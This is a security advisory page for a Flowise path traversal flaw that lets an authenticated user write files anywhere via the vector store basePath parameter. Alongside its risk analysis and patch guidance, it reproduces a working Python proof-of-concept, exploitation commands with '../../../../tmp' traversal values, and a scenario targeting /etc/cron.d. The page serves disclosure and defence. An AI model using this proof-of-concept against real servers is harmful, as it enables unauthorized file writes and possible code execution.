GHSA-w6v6-49gh-mc9w: Flowise: path traversal allows arbitrary file write via vector store
GHSA-w6v6-49gh-mc9w MEDIUM
Flowise contains a path traversal vulnerability in its Faiss and LlamaIndex SimpleStore vector store backends where the basePath parameter is passed directly to filesystem write operations without any sanitization. Any authenticated user with an API token carrying documentStores:upsert-config permission — a role commonly distributed to developers and automation pipelines in team deployments — can write files to arbitrary server locations including cron directories, startup scripts, and web-accessible paths, creating a realistic remote code execution path. While not in CISA KEV and lacking EPSS data, the working proof-of-concept published in the advisory itself eliminates the exploitation knowledge barrier, and this package carries 37 historical CVEs signaling persistent security hygiene issues. Upgrade to flowise 3.1.0 immediately and audit all API tokens for document store upsert permissions.
What is the risk?
Effective risk exceeds the official medium classification. The authentication prerequisite is a real barrier, but API tokens in Flowise deployments are frequently distributed broadly to developers and CI/CD pipelines. The arbitrary file write primitive is highly exploitable in both containerized environments (volume mounts to host) and bare-metal deployments. With a working PoC published in the advisory, any actor with a valid token can achieve impact within minutes and without AI/ML expertise.
How does the attack unfold?
What systems are affected?
How severe is it?
What should I do?
1. Patch: Upgrade flowise and flowise-components to 3.1.0 or later — the only complete fix.
2. Audit: Review all API tokens with documentStores:upsert-config permission; revoke any not tied to known service accounts.
3. Least privilege: Ensure the Flowise process runs as a non-root user with write access scoped to its designated data directory only.
4. Detect: Alert on unexpected file creation outside the configured Flowise data directory using auditd or inotify; monitor for new cron entries or changes to startup scripts.
5. Network isolation: If patching is blocked, restrict the /api/v1/document-store/vectorstore/insert endpoint to trusted internal IPs via firewall rules.
How is it classified?
Which compliance frameworks are affected?
This CVE is relevant to:
Frequently Asked Questions
Is GHSA-w6v6-49gh-mc9w actively exploited?
No confirmed active exploitation of GHSA-w6v6-49gh-mc9w has been reported, but organizations should still patch proactively.
How to fix GHSA-w6v6-49gh-mc9w?
1. Patch: Upgrade flowise and flowise-components to 3.1.0 or later — the only complete fix.
2. Audit: Review all API tokens with documentStores:upsert-config permission; revoke any not tied to known service accounts.
3. Least privilege: Ensure the Flowise process runs as a non-root user with write access scoped to its designated data directory only.
4. Detect: Alert on unexpected file creation outside the configured Flowise data directory using auditd or inotify; monitor for new cron entries or changes to startup scripts.
5. Network isolation: If patching is blocked, restrict the /api/v1/document-store/vectorstore/insert endpoint to trusted internal IPs via firewall rules.
What systems are affected by GHSA-w6v6-49gh-mc9w?
This vulnerability affects the following AI/ML architecture patterns: RAG pipelines, agent frameworks, vector databases, LLM orchestration platforms.
What is the CVSS score for GHSA-w6v6-49gh-mc9w?
No CVSS score has been assigned yet.
What is the AI security impact?
Affected AI Architectures
MITRE ATLAS Techniques
- AML.T0012 Valid Accounts
- AML.T0049 Exploit Public-Facing Application
- AML.T0053 AI Agent Tool Invocation
- AML.T0072 Reverse Shell
Compliance Controls Affected
What are the technical details?
Original Advisory
## Summary

The Faiss and SimpleStore (LlamaIndex) vector store implementations accept a `basePath` parameter from user-controlled input and pass it directly to filesystem write operations without any sanitization. An authenticated attacker can exploit this to write vector store data to arbitrary locations on the server filesystem.

## Vulnerability Details

| Field | Value |
|-------|-------|
| Affected File | `packages/components/nodes/vectorstores/Faiss/Faiss.ts` (lines 79, 91) |
| Affected File | `packages/components/nodes/vectorstores/SimpleStore/SimpleStore.ts` (lines 83-104) |

## Prerequisites

1. **Authentication**: Valid API token with `documentStores:upsert-config` permission
2. **Document Store**: An existing Document Store with at least one processed chunk
3. **Embedding Credentials**: Valid embedding provider credentials (e.g., OpenAI API key)

## Root Cause

### Faiss (`Faiss.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    // ...
    const vectorStore = await FaissStore.fromDocuments(finalDocs, embeddings)
    await vectorStore.save(basePath)  // Direct filesystem write, no validation
}
```

### SimpleStore (`SimpleStore.ts`)

```typescript
async upsert(nodeData: INodeData): Promise<Partial<IndexingResult>> {
    const basePath = nodeData.inputs?.basePath as string  // User-controlled
    let filePath = ''
    if (!basePath) filePath = path.join(getUserHome(), '.flowise', 'llamaindex')
    else filePath = basePath  // Used directly without sanitization
    const storageContext = await storageContextFromDefaults({ persistDir: filePath })  // Writes to arbitrary path
}
```

## Impact

An authenticated attacker can:

1. **Write files to arbitrary locations** on the server filesystem
2. **Overwrite existing files** if the process has write permissions
3. **Potential for code execution** by writing to web-accessible directories or startup scripts
4. **Data exfiltration** by writing to network-mounted filesystems

## Proof of Concept

### poc.py

```python
#!/usr/bin/env python3
"""
POC: Path Traversal in Vector Store basePath (CWE-22)

Usage:
    python poc.py --target http://localhost:3000 --token <API_KEY> --store-id <STORE_ID> --credential <EMBEDDING_CREDENTIAL_ID>
"""

import argparse
import json
import urllib.request
import urllib.error


def post_json(url, data, headers):
    req = urllib.request.Request(
        url,
        data=json.dumps(data).encode("utf-8"),
        headers={**headers, "Content-Type": "application/json"},
        method="POST",
    )
    with urllib.request.urlopen(req, timeout=120) as resp:
        return resp.status, resp.read().decode("utf-8", errors="replace")


def main():
    ap = argparse.ArgumentParser()
    ap.add_argument("--target", required=True)
    ap.add_argument("--token", required=True)
    ap.add_argument("--store-id", required=True)
    ap.add_argument("--credential", required=True)
    ap.add_argument("--base-path", default="/tmp/flowise-path-traversal-poc")
    args = ap.parse_args()

    payload = {
        "storeId": args.store_id,
        "vectorStoreName": "faiss",
        "vectorStoreConfig": {"basePath": args.base_path},
        "embeddingName": "openAIEmbeddings",
        "embeddingConfig": {"credential": args.credential},
    }

    url = args.target.rstrip("/") + "/api/v1/document-store/vectorstore/insert"
    headers = {"Authorization": f"Bearer {args.token}"}

    try:
        status, body = post_json(url, payload, headers)
        print(body)
    except urllib.error.HTTPError as e:
        print(e.read().decode())


if __name__ == "__main__":
    main()
```

### Setup

1. Create a Document Store in Flowise UI
2. Add a Document Loader (e.g., Plain Text) with any content
3. Click "Process" to create chunks
4. Note the Store ID from the URL
5. Get your embedding credential ID from Settings → Credentials

### Exploitation

```bash
# Write to /tmp
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path /tmp/flowise-pwned

# Path traversal variant
python poc.py \
  --target http://127.0.0.1:3000 \
  --token <API_TOKEN> \
  --store-id <STORE_ID> \
  --credential <OPENAI_CREDENTIAL_ID> \
  --base-path "../../../../tmp/traversal-test"
```

### Evidence

```
$ python poc.py --target http://127.0.0.1:3000/ --token <TOKEN> --store-id 30af9716-ea51-47e6-af67-5a759a835100 --credential bb1baf6e-acb7-4ea0-b167-59a09a28108f --base-path /tmp/flowise-pwned
{"numAdded":1,"addedDocs":[{"pageContent":"Lorem Ipsum","metadata":{"docId":"d84d9581-0778-454d-984e-42b372b1b555"}}],"totalChars":0,"totalChunks":0,"whereUsed":[]}

$ ls -la /tmp/flowise-pwned/
total 16
drwxr-xr-x   4 user  wheel   128 Jan 17 12:00 .
drwxrwxrwt  12 root  wheel   384 Jan 17 12:00 ..
-rw-r--r--   1 user  wheel  1234 Jan 17 12:00 docstore.json
-rw-r--r--   1 user  wheel  5678 Jan 17 12:00 faiss.index
```
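The root cause in the advisory above is that `basePath` reaches the filesystem unchecked. The following is an added example of a containment check for that parameter, not Flowise's code and not the 3.1.0 patch; `resolveBasePath`, `storageRoot`, the `default` subdirectory and the sample inputs are assumptions made for illustration.

```typescript
import * as fs from "fs"
import * as os from "os"
import * as path from "path"

// True when `target` is `root` itself or lies beneath it (both absolute paths).
function isInside(root: string, target: string): boolean {
    const rel = path.relative(root, target)
    return rel === "" || (rel !== ".." && !rel.startsWith(".." + path.sep) && !path.isAbsolute(rel))
}

// Hypothetical helper (not a Flowise API): map a caller-supplied basePath to a
// directory under one fixed storage root, or throw.
function resolveBasePath(storageRoot: string, basePath?: string): string {
    const root = fs.realpathSync(storageRoot) // root must exist; its symlinks are resolved
    const requested = basePath && basePath.trim() ? basePath : "default"
    if (requested.includes("\0")) throw new Error("basePath contains NUL")
    if (path.isAbsolute(requested)) throw new Error("absolute basePath rejected")
    const resolved = path.resolve(root, requested) // collapses any ../ segments
    if (!isInside(root, resolved)) throw new Error("basePath escapes storage root")
    // A symlink below the root can still point outside it: resolve the deepest
    // component that already exists and repeat the containment check.
    let existing = resolved
    while (!fs.existsSync(existing)) existing = path.dirname(existing)
    if (!isInside(root, fs.realpathSync(existing))) throw new Error("basePath escapes root via symlink")
    return resolved
}

// Constructed sample inputs, run against a throwaway root in the temp directory.
function runSamples(): Record<string, string> {
    const root = fs.realpathSync(fs.mkdtempSync(path.join(os.tmpdir(), "vs-root-")))
    fs.symlinkSync(os.tmpdir(), path.join(root, "link")) // symlink leading out of the root
    const samples = ["faiss/store-a", "", "../../../../tmp/traversal-test", "/tmp/flowise-pwned", "link/x"]
    const out: Record<string, string> = {}
    for (const s of samples) {
        try {
            out[s] = path.relative(root, resolveBasePath(root, s))
        } catch {
            out[s] = "REJECTED"
        }
    }
    fs.rmSync(root, { recursive: true, force: true })
    return out
}

console.log(runSamples())
```

The check is lexical plus a realpath pass, so a symlink created between validation and the write is still a race; running the process with write access limited to the storage root remains the backstop.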
Exploitation Scenario
An attacker with a compromised developer API token — obtained via phishing, git history leak, or insider access — sends a crafted POST to /api/v1/document-store/vectorstore/insert with basePath set to /etc/cron.d/. Flowise writes faiss.index and docstore.json to that directory without validation. In a second variant targeting containerized Flowise, the attacker sets basePath to a host-mounted volume path, achieving container escape. No AI or ML expertise is required — the entire attack is a single HTTP request with a modified JSON payload.
Weaknesses (CWE)
CWE-22 — Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'): The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory.
- [Implementation] Assume all input is malicious. Use an "accept known good" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does. When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, "boat" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as "red" or "blue." Do not rely exclusively on looking for malicious or malformed inputs. This is likely to miss at least one undesirable input, especially if the code's environment changes. This can give attackers enough room to bypass the intended validation. However, denylis
- [Architecture and Design] For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server.
Source: MITRE CWE corpus.
References
Timeline
Related Vulnerabilities
- CVE-2025-59528 (10.0) Flowise: Unauthenticated RCE via MCP config injection. Same package: flowise
- CVE-2026-46442 (9.9) Flowise: sandbox escape enables authenticated RCE. Same package: flowise
- CVE-2025-61913 (9.9) Flowise: path traversal in file tools leads to RCE. Same package: flowise
- CVE-2026-40933 (9.9) Flowise: RCE via MCP stdio command injection. Same package: flowise
- CVE-2026-56274 (9.9) Flowise: RCE via MCP server command validation bypass. Same package: flowise